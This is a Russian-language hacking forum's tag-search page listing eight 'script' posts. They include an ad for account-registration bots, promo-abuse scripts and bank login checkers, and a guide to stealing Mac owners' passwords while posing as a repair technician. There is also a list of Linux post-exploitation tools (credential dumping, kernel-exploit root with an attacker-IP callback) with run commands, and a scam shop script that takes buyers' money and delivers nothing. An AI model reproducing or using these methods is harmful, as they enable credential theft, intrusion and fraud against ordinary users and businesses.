Jump to content
Новости и объявления.
  • Уважаемые гости. При посещении нашего сайта, просим вас ознакомиться с разделами форума, прежде чем оставлять ваши объявления и т.д. Рекомендуем посетить разделы: "Общение, Коммерческий раздел, Услуги Хакеров и статьи, Отзывы о сайте и пользователях, Черный список" и другие разделы нашего сайта. ***ВНИМАНИЕ*** При обращении за помощью, просим быть внимательными, на сайте есть, как проверенные специалисты, так и непроверенные. Если вы обратились к специалисту, который проверку НЕ проходил, рекомендуем воспользоваться услугой гарант сервиса. xakervip.com
  • Взлом
  • Взлом
  • Гарант-сервис
  • Реклама на форуме

Search the Community

Showing results for tags 'скрипт'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Admin
    • Hacker Forum news.
    • Transactions are the guarantor of the service.
    • A section for resolving controversial issues.
  • Общение.
    • A section for resolving controversial issues.
    • A section for resolving controversial issues.
  • Коммерческий раздел.
    • A trading platform on a hacker site.
    • Services related to communication, telephony, number substitution, etc.
    • Promotion, promotion, SEO, etc.
    • Sale-Purchase Of Cryptocurrencies.
  • Практика взлома, информация и т.д
    • Web vulnerability.
    • Social network
    • E-Mail (Mail).
    • Malware.
    • Soft Hacker
    • Freebie (I'll give it away for free).
    • Help with various software problems and computer problems.
  • Безопасность.
    • Help with malware infection.
    • Punishment for hacking.
    • Secure connection with IP address substitution and security articles.
  • XAKER (Hacker Services and articles).
    • Services of professional hackers (HACKING SERVICES)
    • Hacking services (REFUSED VERIFICATION).
    • About professional hackers (ARTICLES AND STORIES).
    • Requests for help.
  • Other topics, miscellaneous.
    • Reviews of hackers/programmers who helped you.
    • Reviews about our site and suggestions to change your opinion.
    • Reviews of third-party resources.
  • Реклама на форуме.
    • Advertising on the forum.
  • Черный список. (BLACK LIST).
    • BLACKLIST. Scammers and would-be hackers.
    • What methods scammers use to deceive users (Articles).
  • Разное.
    • Other topics, miscellaneous.
    • Other topics, miscellaneous.

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Сайт


ICQ


Yahoo


Skype


Город


Интересы

Found 8 results

  1. https://telegra.ph/file/20a5d00c3043ab0a8b3cb.png Скрипт для накрутки рефералов в Android-приложении https://telegra.ph/file/0f4ef1efc16fb1d1e9cfa.png Скрипт зарегистрировал 49000 аккаунтов на сайте менее, чем за 2 часа. Пишу BAS-скрипты на запросах для несложных сайтов и Android-приложений. Качественная разработка проектов для автоматизации действий в браузере, приложениях и др. парсеры, регеры, грабберы, чекеры, спамеры и. т. д.Загрузка файлов, фотографий на сайты, хостинги, фотостоки.Абуз Окея, Пятерочки, Магнита, Ашана, Магнита, аирдропов и др. акцийНакрутка банеров, рекламных объявлений, сокращённых ссылок.Чекер SMS и капча-сервисов, европейских и американских банков, других форумов, интернет-магазинов, где нужно подобрать пароль.- Регистраторы. Боты для регистрации на различных сайтах (фрихостинги, форумы, почтовые сервисы, соцсети, дедики и т.д). Создание аккаунтов в промышленных масштабах (с автоматическим распознаванием капчи и вводом подтверждения кода из SMS).- Постеры. Боты для постинга (постинг на доски объявлений, наполнение сайтов контентом, загрузка видео, картинок, размещение комментариев и. т.д ).- Парсеры. Боты для сбора, отслеживания и анализа информации с различных интернет ресурсов в автоматическом режиме.- Боты для социальных сетей (программы для smm на заказ). Накрутка лайков, приглашение в группы, парсинг пользователей по критериям, отправка личных сообщений, наполнение групп и. т.п.Автоматизировать можно вообще все, что вы делаете вручную в браузере.Поддержка:- многопоточность- прокси HTTPs / SOCKS5- генерация отпечатков браузера- генерация имени, фамилии и других данных- спинтакс - генератор уникального текста, пример: {Привет|Здравствуй|Добрый день}- уникализация изображений- подгрузка UserAgent и других заголовков- интеграция по API с SMS сервисами (сервисы распознавания капчи)- интеграция по API с другими сервисами и сайтами- оповещения в Telegram- другие задачи связанные со входами в аккаунт и выполнением желаемых действий- и многое другоеРаботаю на честных условиях без предоплаты. Для очень простых сайтов - напишу скрипт бесплатно!Для написания бота, нужен сайт и желательно видео с порядком действий, чтобы я эти действия мог прописать в боте, но если на сайте есть Cloudflare , то на запросах (POST/GET) не выйдет написать бота, на эмуляции не пишу(медленно слишком).По всем вопросам пишите: Telegram ༺Leͥgeͣnͫd༻ ᴳᵒᵈ или T_Condor Я НЕ пишу скрипты под десктопные приложения. Я НЕ пишу ботов для Telegram. Я НЕ пишу чекеры для СНГ банков. Я НЕ пишу скрипты для сайтов, на которых присутствует Cloudflare https://telegra.ph/file/b67491255cce74e632fcd.gif Скрипт скачивает картинки-мемы в папку с сайта (в итоге скачано более 41000 мемов) https://telegra.ph/file/79719a1825a3b3699af92.gif Сокращатель ссылок bit.ly. Создание множества редиректов.
  2. Приветствую, хакеры! В данной статье я хочу рассказать про очень мощный инструмент для DNS-разведки. DNSRecon, как его называют сегодня, представляет собой Python-эквивалент скрипта Ruby, первоначально написанного Карлосом Пересом в конце 2006 года. По его собственным словам, этот инструмент в значительной степени возник из его личной потребности отражать сбор данных, связанных с DNS, в интуитивно понятном виде. В то время как версия Python позволила ему попрактиковаться в вновь приобретенных навыках работы с языком программирования. Установка: Установите пакет git, если он недоступен (например, sudo apt install git) и python3-pip для выполнения требований к управлению пакетами для Python. Клонируйте исходный архив в желаемое место на диске: git clone https://github.com/darkoperator/dnsrecon.git python3-pip install -r requirements.txt --no-warn-script-location python3 dnsrecon.py -h Очень простой в освоении инструмент, поэтому если вам необходимо работать с DNS, то рекомендую пользоваться этой утилитой. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  3. Приветствую, хакеры! Исследователи обнаружили новый способ, который позволяет сформировать цифровой отпечаток пользователя, не только в популярных браузерах вроде Chrome и Firefox, но и в Tor. Суть способа в том, что он перебирает протоколы для запуска приложений на стороне пользователя, и в зависимости от набора установленных - формирует идентификатор. Так, идентификатор, присваиваемый пользователю данным методом, в большинстве случаев уникален для каждого компьютера - а значит, с его помощью можно связать воедино цифровые образы из нескольких отдельных браузеров одного и того же пользователя. Убедитесь в этом сами: Исследователь создал скрипт, который пытается запустить различные программы из браузера (например, используя URL-адрес zoommtg://, предлагающий браузеру запустить клиент Zoom), после чего исходя из полученной информации об установленных программах присваивает вам идентификатор. И хотя сейчас метод формирует идентификатор на основании только 24 программ, список может быть увеличен. Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.
  4. Привет ребята, хочу рассказать вам о простом коде, который можно использовать для перебора рандомных созданных паролей, для взлома. Конечно, для демонстрации взламывать мы будем свой пароль, который мы введем, потому что этот код не предназначен быть скриптом для брута, это лишь небольшое пособие новичкам в программирование, чтобы они уяснили, как работают подобные скрипты. Первым делом необходимо определиться с языком программирования. Думаю из названия статьи вы уже поняли, что использоваться будет язык Python, он легок в понимании и приятен глазу. С помощью питона будет легко показать, как происходит перебор паролей. Думаю стоит закончит предисловие и прейти к делу. Первым делом нам нужно импортировать модули, понадобиться только модуль random. Ипортируем: Теперь необходимо определить переменные, всего их будет 6 Это все переменные необходимые для работы скрипта. Далее мы создаем цикл. В цикле будет выполнятся вся работе. Также добавим данную строчку для того, чтобы обнуляться переменную password. Теперь нас ждет самое интересное – генерация и перебор паролей. Для начала создаем цикл for, чтобы генерировать пароли. Тут понадобится переменная length Теперь создаем код, с помощью которого можно будет узнать, был ли ранее сгенерирован тот или иной пароль, а также проверить идентичен ли он. Собственно это все, нет ничего сложного. Я надеюсь, что данная небольшая статья помогла кому-то разобраться в этих тонкостях. Возможно даже вы когда-нибудь станете хакером.
  5. Всем привет, недавно друг мне показал, как легко можно воровать пароли с маков. Увы обладатели этой техники не особо заботятся безопасностью, а мой знакомых очень не любит данную продукцию, поэтому при каждом удобном моменте забирал все пароли с устройства. А работал он кстати в сервисе по починке компьютерной техники. Для выполнения данного трюка нам нужно будет скачать данный скрипт https://mega.nz/#!3SRh2CAb!u_zczEoRhENox7d6lA3l_ZiiQRVtuFjB0tZgDeRYo_o Итак, после скачивания архива нам нужно взять флешку и можно приступать. Для начала нам нужно подключить флешку к вашему пк и отформатировать ее в формат FAT32. Теперь нужно содержимое архива перенести на нашу флешку. Отлично, теперь нам нужно найти жертву. Самым частым случаем бывает установка плагинов на фотошоп. Все из-за того, что плагины стоят денег, иногда довольно больших, но яблочники зачастую не хотят платить еще больше, поэтому идут на такие действия. Теперь нам нужно вжиться в роль мастера или прочего другого специалиста, чтобы помочь какому-то мажору или прочим индивидам, самое главное не подавать виду. Итак, нужно вставить флешку в пк, естественно дождаться ее подключения, после чего открыть Поиск сочетанием клавиш CTRL + ПРОБЕЛ и вписываем “Терминал” Открываем его и выполняем несколько пунктов: Переходим в директорию нашей флешки с помощью команды:cd путь\до\флешки Вводим команду:sudo start.sh А теперь самая важная часть, наш скрипт запросит пароль от пользователя системы, для этого просто подходим к хозяину аппарата и просим ввести пароль, который якобы нужен для установки плагинов. Вопросов быть не должно. Запомните, что пароль в терминал вводится, но часто не показывается, поэтому после ввода пароля нажимаете Enter и скрипт запустится. Отлично, теперь все пароли в ваших руках. Можете расслабится. Перед тем как проворачивать это дело, советую немного потренироваться и возможно глянуть пару видео на YouTube. Кстати, все пароли, логины и прочая информация будет сохранена в папке Logs. Теперь нам остается только забрать флешку и унести все данные, куда их направить решать только вам. Заключение Во-первых запомните, что делать эти операции нужно только на свой страх и риск, я только показал суть механизма, возможно он поможет вам защитить ваш мак от взлома. А так же не забывайте, что техника от яблок защищена очень плохо, нет никаких антивирусов, поэтому защиты от скрипта на Python – нет.
  6. Друзья, сегодня минимум слов, максимум дела! В материале ниже будем смотреть инструменты пост-эксплуатации для систем Linux! Что можно сделать после того как ты уже прорвался во внутренний периметр сети, или, как на CTF-соревнованиях, когда ты получил доступ к уязвимой тачке и готов броситься в бой дальше! Пост-эксплуатация в практике пен-теста Пост-эксплуатация (англ. post-explotation) — это то, что можно сделать с целевой системой после того, как удалось найти уязвимость и выполнить какой-то участок кода на целевой системе. Так же под этим термином понимается один из этапов взлома компьютерных систем (фаза) позволяющая собирать дальнейшую информацию о целевой системе, получить дальнейший доступ к сети и хранящимся данным. Фаза пост-эксплуатации позволяет идентифицировать такие вещи, как дополнительные подсети, маршрутизаторы, названия серверов, сетевых служб и установленных приложений. Фазы (этапы) проведения тестирования на проникновение Основные паттерны, по которым работают злоумышленники на этапе пост-эксплуатации: получить доступ на выполнение произвольного кода\команд изучение данных, хранящихся на сервере перехват данных, которых нет на системе сейчас, но они могут появиться в будущем организация перманентного доступа к целевой системе эскалация привилегий до уровня системы для непривилегированной учетной записи Дополнительно, хакер может получать информацию о скомпрометированной системе, анализируя следующие параметры: конфигурацию системы (логин и пароль к БД в исходных кодах) конфигурацию веб-сервера (например, httpd.conf, .htaccess) исходные коды приложения (поиск уязвимостей, анализируя логику приложения) доступы к окружению (находясь внутри сети может быть проще попасть на соседние сервера и изолированные сегменты подсети) базы данных (аутентификационная информация к другим системам, хранящаяся в них Обзор инструментов пост-эксплуатации Мы же в материале сделаем акцент на рассмотрение инструментов пост-эксплуатации исключительно под Linux-системы. 1. PXEenum — полное перечисление всего что есть в системе Основной задачей данного скрипта является функция перечисления (англ. Enumeration). Он вытаскивает всю доступную информацию о системе. Данный скрипт создан, если не сказать, что создан для лентяев то для тех, кто ценит свое время. Для запуска он не требует прав root’а, работает в стандартном терминале. # wget https://raw.githubus...ster/PXEnume.sh Установка: # git clone https://github.com/s...uong/PXEnum.git # cd PXEnum/ # chmod +x PXEnum.sh # bash PXEnum.sh 2. MIDA Multitool — палим систему по взрослому Другой интересный инструмент MIDA Multitool созданный на базе менее именитых собратьев SysEnum и RootHelper, но включающий в себя гораздо больший функционал. По воле разработчика функционал MIDA Multitool включает в себя отдельные функции своих предшественников под одним капотом, а именно: SysEnum — Bash скрипт, предназначенный для получения основной информацию о системе, включая, но не ограничиваясь следующими данными — текущий пользователь, IP-конфигурация, таблицы ARP, запущенные процессы и т.д. Roothelper — призван помочь в процессе эскалации привилегий в системе, которая была скомпрометирована, путем выполнения ряда перечислений и использования доверительных сценариев. Устанавливаем скрипт в систему с github: # git clone https://github.com/N...h-Kit-Multitool # cd Bash-Kit-Multitool # chmod +x bashkit.sh Запускаем скрипт: # /.bashkit.sh Дело сделано! Можно запускать в системе! 3. MimiPenguin — тырим пароли без зазрения совести Очень хорошо известный скрипт в узких кругах пен-тестеров под названием MimiPenguin. основной задачей утилиты служит сброса пароля на вход в систему от текущего пользователя Linux. Если такое сравнение возможно то это аналог утилиты mimikatz для дампа пароля в Windows системах (о ней мы уже рассказывали в одной из наших прошлых статей) Кроме того, MimiPenguin поддерживает такие приложения, как VSFTPd (активные подключения клиента FTP), популярнейший web-сервер Apache2 (активные/старые сеансы HTTP BASIC AUTH, но для этого требуется Gcore) и openssh-сервер (активные подключения SSH с использованием команды sudo). И вообще необходимо сказать, что MimiPenguin часто становится частью эксплойтов под Linux. Устанавливаем MimiPenguin забирая его с репозитория GitHub: # git clone https://github.com/h...gal/mimipenguin # cd mimipenguin # ls –a # chmod +x mimipenguin.sh # ./mimipenguin.sh 4. LARE — ломимся под рута используя баги ядра И напоследок еще один довольно простой скрипт, который помогает с помощью использования известных уязвимостей в ядре ОС получать привилегии root удаленно с атакующей машины. Скрипт использует локальные эксплойты для получения root прав для версий ядра Linux Kernel v2.6-v4.8. Кстати, эта тулза очень часто находит свое применение на пиздатом сертификационном экзамене OSCP. Устанавливаем скрипт в систему: # git clone https://github.com/EnigmaDimitri/LARE && cd LARE # chmod +x LARA.sh # LARE.sh -a Запуск скрипта на целевой машине в сети # LARE.sh -l [Attackers-IP] Запуск на машине с подключением к базе данных эксплойтов на GitHub # LARE.sh -l or ./LARE.sh -l Проверка и защита системы от техник пост-эксплуатации Для обеспечения безопасности системы на предмет пост-эксплуатации, по мимо традиционных вариантов защиты как то установка патчей (security patch) и минимизация привилегий, дополнительно существуют специальные тулзы для проверки системы. Ведь в противовес неправильно сложившегося мнения, к пост-эксплуатации не обязательно ведут только 0-dayили устаревший софт,
  7. Заработок на магазине аккаунтов Stram и Origin без вложений от 10 000 рублей в месяц. При этом нам не понадобится приобретать аккаунты и ключи, скрипт самостоятельно генерирует и отображает товары, то есть покупатели ничего не получат. Видеоинстукция: https://www.youtube.com/watch?v=ZsIeu-DcUv0 Скрипт: https://yadi.sk/d/i-k6ysLB3a8uUk
  8. Заплачу за копирование сайта stuner.net , необходима загрузка всех основных функций сайта для работы оффлайн. Цена договорная. Дорого.
×
×
  • Create New...

Important Information

Guidelines
Terms of Use
We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.